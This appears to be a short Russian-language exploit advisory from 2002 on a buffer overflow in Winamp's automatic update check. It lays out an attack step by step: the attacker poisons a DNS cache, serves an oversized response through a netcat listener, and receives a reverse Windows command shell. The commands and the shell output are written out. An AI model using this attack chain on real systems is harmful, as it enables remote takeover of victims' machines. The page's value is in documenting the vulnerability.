Эксплоит для Winamp

Свойства

Дата публикации:
08.07.2002

Код

Winamp включает опцию по умолчанию, которая проверяет при запуске наличие последней версии на http://www.Winamp.com и уведомляет пользователя о наличии возможного обновления. Если при этом получен чрезмерно большой ответ, произойдет переполнение буфера. Пример:
Nameserver - 192.168.0.1
Attacker - 192.168.1.2
Victim (windows machine) - 192.168.0.2
  1. Нападавший портит кэш DNS сервера:
    192.168.1.2:
    x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
    
  2. Жертва резольвит www.winamp.com к машине атакующего.
    192.168.0.2:
    C:>nslookup www.winamp.com
    Server: z3.names.int
    Address: 192.168.0.1
    
    Name: www.winamp.com
    Address: 192.168.1.2
  3. Атакующий запускает эксплоит:
    192.168.1.2:
    x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
  4. На машине жертвы запускается Winamp и пытается найти обновление, происходит переполнение и выполняется код аткующего:
    192.168.1.2:
    x@x:~$ nc -l -p 5555
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    
    C:> 

или введите имя

CAPTCHA